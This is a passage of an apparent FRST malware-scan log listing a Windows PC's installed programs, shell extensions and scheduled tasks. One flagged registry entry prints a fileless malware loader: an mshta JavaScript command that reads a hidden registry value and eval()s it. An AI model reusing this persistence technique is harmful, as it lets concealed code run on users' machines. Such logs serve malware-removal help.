Middle Earth Shadow of Mordor (HKLM-x32\...\Middle Earth Shadow of Mordor_is1) (Version: 1.0 - Релиз от R.G. Steamgames)
Might & Magic X - Legacy (HKLM-x32\...\Might & Magic X - Legacy_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Might and Magic Heroes VII (HKLM-x32\...\Might and Magic Heroes VII_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, ProZorg_tm)
Might and Magic VIII: Day of the Destroyer (HKLM-x32\...\Might and Magic VIII: Day of the Destroyer_is1) (Version:  - GOG.com)
Minecraft1.8 (HKLM-x32\...\Minecraft1.8) (Version:  - )
Minecraft1.9 (HKLM-x32\...\Minecraft1.9) (Version:  - )
MiniTool Partition Wizard Free 9.1 (HKLM\...\{05D996FA-ADCB-4D23-BA3C-A7C184A8FAC6}_is1) (Version:  - MiniTool Solution Ltd.)
Mozilla Firefox 32.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 32.0 (x86 en-US)) (Version: 32.0 - Mozilla)
Mozilla Firefox 54.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 54.0.1 (x64 en-US)) (Version: 54.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 32.0 - Mozilla)
MSI Afterburner 4.2.0 (HKLM-x32\...\Afterburner) (Version: 4.2.0 - MSI Co., LTD)
My.com Game Center (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\MyComGames) (Version: 3.196 - My.com B.V.)
NCSOFT Game Launcher (HKLM-x32\...\NCLauncher_NCWest) (Version:  - NCSOFT)
Need for Speed™ Rivals (HKLM-x32\...\{E0A32336-AA27-4053-99B2-C3380B7B95AC}) (Version: 1.3.0.0 - Electronic Arts)
Nexon Game Manager (HKLM-x32\...\{EA2DB6E0-72C5-4ef9-A3A0-E6705F4A6A9E}) (Version:  - )
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.5 - Black Tree Gaming)
NieR.Automata - Day One Edition - Version 1787.043 (HKLM-x32\...\NieR.Automata - Day One Edition_is1) (Version: 1787.043 - RePack by VickNet)
No Man's Sky (HKLM\...\Steam App 275850) (Version:  - Hello Games)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.2 - Notepad++ Team)
Nox APP Player (HKLM-x32\...\Nox) (Version: 3.7.1.0 - Duodian Technology Co. Ltd.)
NVIDIA 3D Vision Driver 376.33 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.33 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.2.0.96 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.2.0.96 - NVIDIA Corporation)
NVIDIA Graphics Driver 376.33 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.33 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{E10DB5DA-E576-40EA-A7FC-1CB2A7B283A6}) (Version: 9.09.1112 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.2.0.96 - NVIDIA Corporation) Hidden
NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 2.0.0.0 - NVIDIA Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenIV (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\OpenIV) (Version: 2.8.703 - .black/OpenIV Team)
OpenOffice 4.1.1 (HKLM-x32\...\{9395F41D-0F80-432E-9A59-B8E477E7E163}) (Version: 4.11.9775 - Apache Software Foundation)
Opera Stable 46.0.2597.57 (HKLM-x32\...\Opera 46.0.2597.57) (Version: 46.0.2597.57 - Opera Software)
OPPO售后驱动程序 1.4.0 (HKLM\...\{F9CA1F0B-D4A8-41C5-99AD-D39FFA50B09B}_is1) (Version: 1.4.0.8 - 广东欧珀移动通信有限公司)
Ori and the Blind Forest (HKLM-x32\...\Ori and the Blind Forest_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Outlast (HKLM-x32\...\Outlast_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Oxenfree (HKLM-x32\...\Oxenfree_is1) (Version:  - )
ParentalControl(x86) (HKU\.DEFAULT\...\ParentalControl) (Version:  - )
PAYDAY 2 (HKLM\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
PlagueInc 1.0 (HKLM-x32\...\PlagueInc 1.0) (Version: 1.0 - Cat-A-Cat)
Portal 2 (HKLM-x32\...\Steam App 620) (Version:  - Valve)
QQ International (HKLM-x32\...\{3CA54984-A14B-42FE-9FF1-7EA90151D725}) (Version: 1.91.1369.0 - Tencent Technology(Shenzhen) Company Limited)
Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{CCD797F1-171F-4B3A-BD30-4F59F653E1A0}) (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (HKLM\...\{F45761DC-2470-47FF-9E9B-F4016568C29A}) (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Network Manager (HKLM\...\{4692B750-DE88-4DCF-9163-745AF5604B24}) (Version: 1.1.42.1045 - Qualcomm Atheros) Hidden
Qualcomm Atheros Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.42.1045 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9600.21243 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7161 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Registry Repair 5.0.1.86 (HKLM-x32\...\Registry Repair) (Version: 5.0.1.86 - Glarysoft Ltd)
RenegadeX Alternative Launcher (HKLM-x32\...\{BF8E3C46-58F2-40E2-B107-BB93D05B7186}) (Version: 0.2.0 - Equabyte)
Resident Evil 7: Biohazard (HKLM-x32\...\Resident Evil 7: Biohazard_is1) (Version:  - )
Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version:  - Crystal Dynamics)
RivaTuner Statistics Server 6.4.1 (HKLM-x32\...\RTSS) (Version: 6.4.1 - Unwinder)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.7.8 - Rockstar Games)
RogueKiller version 12.8.5.0 (HKLM\...\8B3D7924-ED89-486B-8322-E8594065D5CB_is1) (Version: 12.8.5.0 - Adlice Software)
Ryse - Son of Rome (HKLM-x32\...\Ryse - Son of Rome_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Sacred 3 (HKLM-x32\...\Sacred 3_is1) (Version:  - )
Sacred Citadel (HKLM-x32\...\Sacred Citadel_is1) (Version:  - )
Sacred Gold (HKLM-x32\...\GOGPACKSACREDGOLD_is1) (Version: 2.0.0.4 - GOG.com)
Samorost 3 (HKLM-x32\...\Samorost 3_is1) (Version: 1.0.0.0 - )
SDFormatter (HKLM-x32\...\{179324FF-7B16-4BA8-9836-055CAAEE4F08}) (Version: 4.0.0 - SD Association)
SecEditCtl.BOC (only remove) (HKLM-x32\...\SecEditCtl.BOC01000009) (Version:  - CFCA)
Shadowrun Dragonfall - Director's Cut (HKLM-x32\...\1207660913_is1) (Version: 2.0.4.6 - GOG.com)
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0350 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.2.0.96 - NVIDIA Corporation) Hidden
Silence (HKLM-x32\...\1452682147_is1) (Version: 2.0.0.2 - GOG.com)
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Skyrim Legendary Edition (HKLM-x32\...\{42145802-221A-4576-A198-AEE3CB3387B0}) (Version: 1.9.32.0 - Xinica)
SMITE (HKLM\...\Steam App 386360) (Version:  - Hi-Rez Studios)
Sniper Elite 3 (HKLM-x32\...\U25pcGVyRWxpdGUz_is1) (Version: 1 - )
Sniper Elite 4 (HKLM-x32\...\Sniper Elite 4_is1) (Version:  - )
SoftEther VPN Server (HKLM\...\softether_sevpnserver) (Version: 4.21.9613 - SoftEther VPN Project)
Source SDK Base 2007 (HKLM-x32\...\Steam App 218) (Version:  - Valve)
Spore (HKLM-x32\...\Spore_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
SSDlife Pro (HKLM-x32\...\{3EBFD83D-D221-4D8E-8762-93ED98DBE9F7}) (Version: 2.1.29 - BinarySense Inc.)
STAR WARS - The Force Unleashed II (HKLM-x32\...\STAR WARS - The Force Unleashed II_is1) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Stellar Phoenix Windows Data Recovery - Professional (HKLM-x32\...\Stellar Phoenix Windows Data Recovery - Professional_is1) (Version: 6.0.0.1 - Stellar Information Technology Pvt Ltd.)
Stronghold Crusader 2 - Delivering Justice (HKLM-x32\...\Stronghold Crusader 2: Delivering Justice_is1) (Version: 2.2.0.7 - GOG.com)
Stronghold Crusader 2 - The Emperor and The Hermit (HKLM-x32\...\Stronghold Crusader 2: The Emperor and The Hermit_is1) (Version: 2.0.0.5 - GOG.com)
Stronghold Crusader 2 - The Jackall and The Khan (HKLM-x32\...\Stronghold Crusader 2: The Jackall and The Khan_is1) (Version: 2.0.0.5 - GOG.com)
Stronghold Crusader 2 - The Princess and The Pig (HKLM-x32\...\Stronghold Crusader 2: The Princess and The Pig_is1) (Version: 2.0.0.5 - GOG.com)
Stronghold Crusader 2 - The Templar and The Duke (HKLM-x32\...\Stronghold Crusader 2: The Templar and The Duke_is1) (Version: 2.0.0.5 - GOG.com)
Stronghold Crusader 2 (HKLM-x32\...\1433852499_is1) (Version: 2.2.0.7 - GOG.com)
Stronghold Legends: Steam Edition (HKLM-x32\...\Stronghold Legends: Steam Edition_is1) (Version:  - )
StrongVPN Client (HKLM-x32\...\{6EB6293C-9286-4981-8672-956E1A92F33B}_is1) (Version: 1.5.1.0 - Black Oak Computers, Inc)
Subtitle Edit 3.5.3 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.3.0 - Nikse)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.10.12 - Synaptics Incorporated)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
The Expendabros (HKLM\...\Steam App 312990) (Version:  - Free Lives)
The Forest (HKLM\...\Steam App 242760) (Version:  - Endnight Games Ltd)
The Forest version The Forest (HKLM-x32\...\The Forest_is1) (Version: The Forest - )
THE GAME OF LIFE - The Official 2016 Edition (HKLM\...\dGhlZ2FtZW9mbGlmZXRoZW9mZmljaWFsMjAxNmVkaXRpb24_is1) (Version: 1 - )
THE KING OF FIGHTERS XIII STEAM EDITION (HKLM-x32\...\Steam App 222940) (Version:  - SNK Playmore)
THE KING OF FIGHTERS XIV STEAM EDITION (HKLM\...\Steam App 571260) (Version:  - SNK CORPORATION)
THE KING OF FIGHTERS XIV STEAM EDITION Closed Beta Test (HKLM\...\Steam App 620420) (Version:  - )
The Sims 4 (HKLM-x32\...\The Sims 4_is1) (Version:  - )
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.20.60.1020 - Electronic Arts Inc.)
The Universim - Mother Planet Demo (HKLM\...\Steam App 401980) (Version:  - Crytivo Games)
The Walking Dead - Season 2 (HKLM-x32\...\The Walking Dead - Season 2_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
The Walking Dead A New Frontier Episode 5 (HKLM-x32\...\The Walking Dead A New Frontier Episode 5_is1) (Version:  - )
The Witcher 3 - Wild Hunt (HKLM-x32\...\1495134320_is1) (Version: 2.0.0.51 - GOG.com)
The Witcher Adventure Game (HKLM-x32\...\1207666883_is1) (Version: 2.7.0.24 - GOG.com)
This War of Mine - Anniversary Edition (HKLM-x32\...\This War of Mine - Anniversary Edition_is1) (Version:  - )
This War of Mine (HKLM-x32\...\{5FD7B6B3-08C7-4FEE-9C37-A2134C699885}}_is1) (Version: 1 - 11 bit studios)
This War of Mine: The Little Ones (HKLM-x32\...\This War of Mine: The Little Ones_is1) (Version:  - )
Tiberium Wars 1.09 (HKLM-x32\...\Command & Conquer 3: Tiberium Wars_is1) (Version:  - HWMasters.com)
Transistor (HKLM-x32\...\Transistor_is1) (Version:  - )
Trine 2 -  Complete Story (HKLM-x32\...\GOGPACKTRINE2_is1) (Version: 2.0.0.4 - GOG.com)
Trine 2 (HKLM\...\Steam App 35720) (Version:  - Frozenbyte)
Trine 3 The Artifacts of Power (HKLM-x32\...\Trine 3 The Artifacts of Power_is1) (Version: 1.0.2 - )
Trine Enhanced Edition (HKLM-x32\...\1207659020_is1) (Version: 2.0.0.2 - GOG.com)
TunnelBear (HKLM-x32\...\{35184AD1-A3C9-4B38-A1F3-3D9C48EFAAEC}) (Version: 2.3.25.0 - TunnelBear) Hidden
TunnelBear (HKLM-x32\...\{90e7dc26-e7df-406b-af23-61df6728a9f6}) (Version: 2.3.25.0 - TunnelBear)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
UE3Redist (HKLM-x32\...\{6530FDAA-5B1F-4830-95BB-650E9804D239}) (Version: 1.00.0000 - Epic Games) Hidden
UE3Redist (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\InstallShield_{6530FDAA-5B1F-4830-95BB-650E9804D239}) (Version: 1.00.0000 - Epic Games)
UE4 Prerequisites (x64) (HKLM\...\{36EAD5CF-44EF-4FCF-8BE1-D96C4835D7A4}) (Version: 1.0.11.0 - Epic Games, Inc.) Hidden
UE4 Prerequisites (x64) (HKLM-x32\...\{2890ae6b-90e9-448d-b3e6-97e43c21e2fd}) (Version: 1.0.13.0 - Epic Games, Inc.) Hidden
UnionPay Security Non plug 1.0.0.2 (HKLM-x32\...\UnionPay Security Non plug) (Version: 1.0.0.2 - China UnionPay)
Uplay (HKLM-x32\...\Uplay) (Version: 7.4 - Ubisoft)
Valiant Hearts The Great War (HKLM-x32\...\Valiant Hearts The Great War_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Vegas Pro 10.0 (64-bit) (HKLM\...\{D207019F-D0A5-11DF-A282-0013D3D69929}) (Version: 10.0.388 - Sony)
Viridi (HKLM-x32\...\Steam App 375950) (Version:  - Ice Water Games)
Virtual Villagers 5 - New Believers (HKLM-x32\...\{0D46446A-5EC5-0983-4274-4B13C546FEF5}}_is1) (Version:  - Last Day of Work Games)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VSFilter 2.41.322 (0c3a1ea) Nightly (64-bit) (HKLM\...\vsfilter64_is1) (Version: 2.41.322 - MPC-HC Team)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
Warhammer 40,000 Dawn of War III (HKLM-x32\...\Warhammer 40,000 Dawn of War III_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, Panky)
WebM Project Directshow Filters (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\webmdshow) (Version:  - )
WIDCOMM BTW Development Kit (HKLM-x32\...\{0B75A75A-3D2C-479B-ACA0-A17A0B4B7628}) (Version: 6.1.0.1506 - Broadcom Corporation)
Windows Driver Package - BigNox Corporation (VBoxUSB) USB  (09/16/2015 4.3.12) (HKLM\...\76B144D15273552931249392EDB13C0BBD52C84E) (Version: 09/16/2015 4.3.12 - BigNox Corporation)
Windows Driver Package - BigNox Corporation VBoxUSBMon System  (09/16/2015 4.3.12) (HKLM\...\39F54A37125643D2E1E90FA7D81F36ACC9441510) (Version: 09/16/2015 4.3.12 - BigNox Corporation)
Windows Driver Package - BigNox Corporation XQHDrv System  (09/16/2015 4.3.12) (HKLM\...\0147813640F7AF69F569581EE672B6BE1E71798E) (Version: 09/16/2015 4.3.12 - BigNox Corporation)
WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
WireShare (HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\WireShare) (Version: 5.6.4.3 - WireShare)
Wondershare Dr.Fone for Android(Build 5.5.1.8) (HKLM-x32\...\{1DB91A95-C548-4BA5-9D4C-18C7DEAAC39F}_is1) (Version: 5.5.1.8 - Wondershare Software Co.,Ltd.)
Wondershare Helper Compact 2.5.2 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.2 - Wondershare)
Wondershare PDFelement 6 Pro(Build 6.1.0) (HKLM-x32\...\{B026557A-EF19-4812-8A79-B30F94AA0A78}_is1) (Version: 6.1.0.2364 - Wondershare Software Co.,Ltd.)
Worms Reloaded (HKLM-x32\...\Steam App 22600) (Version:  - Team17 Software Ltd.)
WPS Office 2016 Premium (HKLM-x32\...\{25FE1012-A21C-42D7-9FAC-AD5299E2A0A3}) (Version: 10.1.0.5486 - SamuRa1)
Xiph.Org Open Codecs 0.85.17777 (HKLM-x32\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)
Youtube Downloader HD v. 2.9.9.30 (HKLM-x32\...\Youtube Downloader HD_is1) (Version:  - YoutubeDownloaderHD.com)
乐视视频 V7.3.2.192 (HKLM-x32\...\乐视视频) (Version: V7.3.2.192 - 乐视网信息技术(北京)股份有限公司.)
优酷 (HKLM-x32\...\YoukuClient) (Version: 7.2.1.6011 - youkutudou, Inc.)
搜狗拼音输入法 8.0正式版 (HKLM-x32\...\Sogou Input) (Version: 8.0.0.8111 - Sogou.com)
百度网盘 (HKLM-x32\...\百度云管家) (Version: 5.5.5 - 百度在线网络技术(北京)有限公司)
英特尔® PROSet/无线软件 (HKLM-x32\...\{85b9d34f-7397-4e39-8600-07942ef6ca04}) (Version: 17.0.5 - Intel Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{5ed339e2-e6a7-576a-be70-fb9cdbdce50e}\InprocServer32 -> C:\Users\w7\AppData\Roaming\ytmediacenter\X64\npYoukuAgent_x64.dll (Youku)
CustomCLSID: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000_Classes\CLSID\{679F137C-3162-45da-BE3C-2F9C3D093F64}\InprocServer32 -> C:\Windows\system32\shdocvw.dll (Microsoft Corporation)
HKU\.DEFAULT\Software\Classes\b586d: "C:\Windows\system32\mshta.exe" "javascript:McWTU4a5i="TwujZb";N2E=new ActiveXObject("WScript.Shell");s6yGd="2GtCLhxi";QPf6U3=N2E.RegRead("HKCU\\software\\sfcc\\bymfflwgby");DNQ9RS="1OTKLf";eval(QPf6U3);M9MhRI7="LLhwqc";" <==== ATTENTION
ShellIconOverlayIdentifiers: [   Report64] -> {C7D0BD5D-B11A-47DB-BB14-7F930B3F7705} => C:\Users\w7\AppData\Roaming\ytmediacenter\X64\report64.dll [2015-10-10] (Youku.com)
ShellIconOverlayIdentifiers: [   YoukuModShlExt64] -> {314711D6-6B45-4AF7-83D8-DCD8537FD241} => C:\Users\w7\AppData\Roaming\ytmediacenter\X64\coreplay64.dll [2015-12-08] (Youku.com)
ShellIconOverlayIdentifiers-x32-x32: [   Report] -> {32C50D96-7A9E-4F3E-8763-F74D86AFEDC2} => C:\Users\w7\AppData\Roaming\ytmediacenter\report.dll [2015-10-10] (Youku.com)
ShellIconOverlayIdentifiers-x32-x32-x32: [   YoukuModShlExt] -> {9071723E-9F41-4A8C-9CC2-EB6F94BA9B9E} => C:\Users\w7\AppData\Roaming\ytmediacenter\coreplay.dll [2015-12-08] (Youku.com)
ContextMenuHandlers1: [360WangPanShell] -> {1D39A523-4DF5-4562-8FFF-08C740632F4F} => C:\Program Files (x86)\360\360WangPan\360WangPanShell64.dll [2016-03-22] (360.cn)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2016-11-02] ()
ContextMenuHandlers1: [Balabolka] -> {6CB83A5A-AA68-4895-9F54-175E789AE149} => C:\Program Files (x86)\Balabolka\BFileExt.dll [2013-03-01] (Ilya Morozov)
ContextMenuHandlers1: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2014-02-24] (ESET)
ContextMenuHandlers1: [MagicISO] -> {DB85C504-C730-49DD-BEC1-7B39C6103B7A} => C:\Program Files (x86)\MagicISO\misosh64.dll [2008-05-22] (MagicISO, Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2014-08-27] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2014-08-27] (Alexander Roshal)
ContextMenuHandlers1-x32: [YunShellExt] -> {6D85624F-305A-491d-8848-C1927AA0D790} => C:\Users\w7\AppData\Roaming\baidu\BaiduNetdisk\YunShellExt64.dll [2017-05-18] ()
ContextMenuHandlers2: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2014-02-24] (ESET)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-05-09] (Malwarebytes)
ContextMenuHandlers4: [360WangPanShell] -> {1D39A523-4DF5-4562-8FFF-08C740632F4F} => C:\Program Files (x86)\360\360WangPan\360WangPanShell64.dll [2016-03-22] (360.cn)
ContextMenuHandlers4: [MagicISO] -> {DB85C504-C730-49DD-BEC1-7B39C6103B7A} => C:\Program Files (x86)\MagicISO\misosh64.dll [2008-05-22] (MagicISO, Inc.)
ContextMenuHandlers4: [YunShellExt] -> {6D85624F-305A-491d-8848-C1927AA0D790} => C:\Users\w7\AppData\Roaming\baidu\BaiduNetdisk\YunShellExt64.dll [2017-05-18] ()
ContextMenuHandlers5: [DreamScene] -> {BE800AEB-A440-4B63-94CD-AA6B43647DF9} => C:\Windows\System32\DreamScene.dll [2015-08-29] (Microsoft Corporation)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-12-31] (Intel Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2016-12-12] (NVIDIA Corporation)
ContextMenuHandlers6: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2014-02-24] (ESET)
ContextMenuHandlers6: [MagicISO] -> {DB85C504-C730-49DD-BEC1-7B39C6103B7A} => C:\Program Files (x86)\MagicISO\misosh64.dll [2008-05-22] (MagicISO, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-05-09] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2014-08-27] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2014-08-27] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {00C84079-6D5C-4523-884E-A350F671831A} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-12-13] (NVIDIA Corporation)
Task: {032A412F-90A5-4270-9A60-70046E0FF736} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe aepdu.dll,AePduRunUpdate -nolegacy
Task: {0BC5E9EE-52FD-42C0-9401-6D204954CF46} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2016-12-13] (NVIDIA Corporation)
Task: {25B63122-3474-4A4D-9F89-C03EA259220C} - System32\Tasks\{CCAC4C17-1982-4B4C-B885-B96F34D9604F} => F:\Games\Mafia II\pc\Mafia2.exe [2011-02-04] (2K Czech)
Task: {2B08218F-710A-4477-A232-03CD78721B9A} - System32\Tasks\SBWUpdateTask_Time_7481e473-00FFDD369F91 => C:\Program Files (x86)\Common Files\Speedbit\SbUpdate\SBUpdate.exe [2017-05-01] (Speedbit Ltd.) <==== ATTENTION
Task: {301C98E8-146A-425C-A6D9-20979157B7B7} - System32\Tasks\{1A7F4EA1-5E1C-4FC2-8CEC-730F1A14FCC6} => C:\Windows\system32\pcalua.exe -a "C:\Users\w7\Downloads\vcredist_x64 (1).exe" -d C:\Users\w7\Downloads
Task: {3132AD68-44DB-4BA7-B6BA-2ACB404E28AF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {345BA0DE-6F8F-475D-A0EF-CFF03B65E553} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-08-09] (Adobe Systems Incorporated)
Task: {36B09B80-9334-4C54-9864-2B20D6FCF263} - System32\Tasks\Opera scheduled Autoupdate 1439020676 => C:\Program Files (x86)\Opera\launcher.exe [2017-07-18] (Opera Software)
Task: {3D8082AA-B5BD-4810-B4DE-AA5EBA3DA1BD} - System32\Tasks\Microsoft\Windows\PLA\System\{8A182A64-BC8F-491B-9FB4-325F73EDEB80}_System Diagnostics => C:\Windows\system32\rundll32.exe C:\Windows\system32\pla.dll,PlaHost "system\System Diagnostics" "$(Arg0)"
Task: {419D2F7F-6866-44C9-918F-9C7EEF756F06} - System32\Tasks\SBWUpdateTask_Logon_7481e473-00FFDD369F91 => C:\Program Files (x86)\Common Files\Speedbit\SbUpdate\SBUpdate.exe [2017-05-01] (Speedbit Ltd.) <==== ATTENTION
Task: {43DF4723-4BB3-4B0E-B719-0E467330A31F} - System32\Tasks\{0C469151-13B3-494B-A746-BD5E2CB90530} => F:\Games\Mafia II\pc\Mafia2.exe [2011-02-04] (2K Czech)
